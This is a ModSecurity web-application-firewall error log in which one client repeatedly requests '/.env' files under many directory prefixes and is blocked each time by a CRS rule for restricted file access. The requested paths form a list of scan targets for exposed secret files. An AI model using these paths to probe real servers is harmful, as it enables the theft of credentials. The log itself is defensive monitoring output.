[Thu Nov 27 04:11:55.484382 2025] [:error] [pid 353187] [client 54.236.248.190:56396] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSfBe3jjVMPW7zDRgsawAAAAAAM"]
[Thu Nov 27 04:11:55.484572 2025] [:error] [pid 353187] [client 54.236.248.190:56396] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSfBe3jjVMPW7zDRgsawAAAAAAM"]
[Thu Nov 27 04:11:55.892860 2025] [:error] [pid 353186] [client 54.236.248.190:56512] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSfBeyOJA5NFmjDGU5hH9AAAAAI"]
[Thu Nov 27 04:11:55.893081 2025] [:error] [pid 353186] [client 54.236.248.190:56512] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSfBeyOJA5NFmjDGU5hH9AAAAAI"]
[Thu Nov 27 04:11:55.893272 2025] [:error] [pid 353186] [client 54.236.248.190:56512] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSfBeyOJA5NFmjDGU5hH9AAAAAI"]
[Thu Nov 27 04:11:56.303143 2025] [:error] [pid 354740] [client 54.236.248.190:56622] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSfBfCz_tey498iHQ9af8wAAAAc"]
[Thu Nov 27 04:11:56.303365 2025] [:error] [pid 354740] [client 54.236.248.190:56622] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSfBfCz_tey498iHQ9af8wAAAAc"]
[Thu Nov 27 04:11:56.303566 2025] [:error] [pid 354740] [client 54.236.248.190:56622] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSfBfCz_tey498iHQ9af8wAAAAc"]
[Thu Nov 27 04:11:56.714036 2025] [:error] [pid 353188] [client 54.236.248.190:56730] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSfBfD4fHjXDucK3GWvWWAAAAAQ"]
[Thu Nov 27 04:11:56.714251 2025] [:error] [pid 353188] [client 54.236.248.190:56730] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSfBfD4fHjXDucK3GWvWWAAAAAQ"]
[Thu Nov 27 04:11:56.714469 2025] [:error] [pid 353188] [client 54.236.248.190:56730] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSfBfD4fHjXDucK3GWvWWAAAAAQ"]
[Thu Nov 27 04:11:57.148829 2025] [:error] [pid 353184] [client 54.236.248.190:56836] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSfBfYG5PbbCKE0XPKZgagAAAAA"]
[Thu Nov 27 04:11:57.149140 2025] [:error] [pid 353184] [client 54.236.248.190:56836] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSfBfYG5PbbCKE0XPKZgagAAAAA"]
[Thu Nov 27 04:11:57.149415 2025] [:error] [pid 353184] [client 54.236.248.190:56836] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSfBfYG5PbbCKE0XPKZgagAAAAA"]
[Thu Nov 27 04:11:57.559920 2025] [:error] [pid 354741] [client 54.236.248.190:56998] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSfBfc6T76P9_m8d0ivoUAAAAAg"]
[Thu Nov 27 04:11:57.560138 2025] [:error] [pid 354741] [client 54.236.248.190:56998] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSfBfc6T76P9_m8d0ivoUAAAAAg"]
[Thu Nov 27 04:11:57.560315 2025] [:error] [pid 354741] [client 54.236.248.190:56998] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSfBfc6T76P9_m8d0ivoUAAAAAg"]
[Thu Nov 27 04:11:57.992432 2025] [:error] [pid 353185] [client 54.236.248.190:57126] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSfBfXTG8IrOxOxezX5ARwAAAAE"]
[Thu Nov 27 04:11:57.992684 2025] [:error] [pid 353185] [client 54.236.248.190:57126] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSfBfXTG8IrOxOxezX5ARwAAAAE"]
[Thu Nov 27 04:11:57.992900 2025] [:error] [pid 353185] [client 54.236.248.190:57126] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSfBfXTG8IrOxOxezX5ARwAAAAE"]
[Thu Nov 27 04:11:58.404984 2025] [:error] [pid 354739] [client 54.236.248.190:57226] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSfBfu_UStX-GTeIAe_ukQAAAAY"]
[Thu Nov 27 04:11:58.405208 2025] [:error] [pid 354739] [client 54.236.248.190:57226] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSfBfu_UStX-GTeIAe_ukQAAAAY"]
[Thu Nov 27 04:11:58.405400 2025] [:error] [pid 354739] [client 54.236.248.190:57226] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSfBfu_UStX-GTeIAe_ukQAAAAY"]
[Thu Nov 27 04:11:58.817740 2025] [:error] [pid 354737] [client 54.236.248.190:57318] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSfBfneYAxY_xo8wsP-UZgAAAAU"]
[Thu Nov 27 04:11:58.817958 2025] [:error] [pid 354737] [client 54.236.248.190:57318] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSfBfneYAxY_xo8wsP-UZgAAAAU"]
[Thu Nov 27 04:11:58.818157 2025] [:error] [pid 354737] [client 54.236.248.190:57318] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSfBfneYAxY_xo8wsP-UZgAAAAU"]
[Thu Nov 27 04:11:59.253157 2025] [:error] [pid 353187] [client 54.236.248.190:57400] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSfBf3jjVMPW7zDRgsawAQAAAAM"]
[Thu Nov 27 04:11:59.253377 2025] [:error] [pid 353187] [client 54.236.248.190:57400] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSfBf3jjVMPW7zDRgsawAQAAAAM"]
[Thu Nov 27 04:11:59.253566 2025] [:error] [pid 353187] [client 54.236.248.190:57400] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSfBf3jjVMPW7zDRgsawAQAAAAM"]
[Thu Nov 27 04:11:59.663619 2025] [:error] [pid 353186] [client 54.236.248.190:57492] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSfBfyOJA5NFmjDGU5hH9QAAAAI"]
[Thu Nov 27 04:11:59.663838 2025] [:error] [pid 353186] [client 54.236.248.190:57492] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSfBfyOJA5NFmjDGU5hH9QAAAAI"]
[Thu Nov 27 04:11:59.664029 2025] [:error] [pid 353186] [client 54.236.248.190:57492] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSfBfyOJA5NFmjDGU5hH9QAAAAI"]
[Thu Nov 27 04:12:00.073287 2025] [:error] [pid 354740] [client 54.236.248.190:57572] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSfBgCz_tey498iHQ9af9AAAAAc"]
[Thu Nov 27 04:12:00.073574 2025] [:error] [pid 354740] [client 54.236.248.190:57572] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSfBgCz_tey498iHQ9af9AAAAAc"]
[Thu Nov 27 04:12:00.073791 2025] [:error] [pid 354740] [client 54.236.248.190:57572] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSfBgCz_tey498iHQ9af9AAAAAc"]
[Thu Nov 27 04:12:00.483122 2025] [:error] [pid 353188] [client 54.236.248.190:57662] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSfBgD4fHjXDucK3GWvWWQAAAAQ"]
[Thu Nov 27 04:12:00.483341 2025] [:error] [pid 353188] [client 54.236.248.190:57662] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSfBgD4fHjXDucK3GWvWWQAAAAQ"]
[Thu Nov 27 04:12:00.483524 2025] [:error] [pid 353188] [client 54.236.248.190:57662] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSfBgD4fHjXDucK3GWvWWQAAAAQ"]
[Thu Nov 27 04:12:00.896577 2025] [:error] [pid 353184] [client 54.236.248.190:57750] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSfBgIG5PbbCKE0XPKZgawAAAAA"]
[Thu Nov 27 04:12:00.896801 2025] [:error] [pid 353184] [client 54.236.248.190:57750] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSfBgIG5PbbCKE0XPKZgawAAAAA"]
[Thu Nov 27 04:12:00.896999 2025] [:error] [pid 353184] [client 54.236.248.190:57750] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSfBgIG5PbbCKE0XPKZgawAAAAA"]
